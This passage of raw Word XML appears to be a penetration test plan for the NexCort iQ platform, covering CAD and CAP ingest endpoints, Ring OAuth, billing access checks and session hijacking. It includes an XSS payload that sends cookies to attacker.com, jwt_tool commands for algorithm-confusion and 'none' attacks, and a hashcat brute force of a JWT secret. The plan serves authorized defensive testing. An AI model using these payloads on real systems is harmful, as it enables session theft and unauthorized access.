          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/cad/webhook/{agencyId}/{integrationId} — inject malformed CAD payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/cad/cap/ingest/{agencyId} — inject malformed CAP 1.2 XML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/cad/cap/ingest/auto — FIPS routing bypass — can one agency receive another's CAP alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Force poll endpoint — does /api/admin/cad-integrations/{id}/force-poll require auth?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ring OAuth Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open redirect — manipulate return_url parameter to redirect to attacker-controlled site</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">State parameter bypass — replay an old OAuth state token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Token leakage — does the Ring access token appear in CloudWatch logs or API responses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnection race — submit two simultaneous reconnect requests to trigger state conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Billing and Pricing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to access /api/admin/pricing/global as rcadmin (should be 403)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to access /api/admin/pricing/tenants/{id} as agencyadmin (should be 403)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt PUT /api/admin/pricing/tenants/{id} with a different agencyId in the body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to access another agency's invoices via /api/agencies/{agencyId}/invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No JWT claim tampering allows cross-tenant data access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No role escalation achievable via token manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All unauthenticated requests to protected endpoints return 401 or 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No Ring OAuth tokens appear in logs or API responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP ingest correctly rejects malformed XML without exposing internal errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Session Hijacking Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Session hijacking tests verify that authentication tokens cannot be stolen, forged, or replayed by an attacker to impersonate a legitimate user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Cookie Theft via XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for reflected XSS on input fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for stored XSS in incident narrative, caller name fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># If XSS succeeds and tokens are in cookies — session is compromised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ uses Cognito tokens (JWT in Authorization header) not session cookies. XSS cannot steal Authorization header values directly, but can make authenticated API calls from the victim's browser context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. JWT Algorithm Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Install jwt_tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install jwt_tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Decode a captured JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test algorithm confusion (RS256 → HS256)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN} -X a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test 'none' algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {JWT_TOKEN} -X n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Brute force weak HMAC secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -a 0 -m 16500 {JWT_TOKEN} /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. CSRF Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test if state-changing requests require CSRF token or SameSite cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
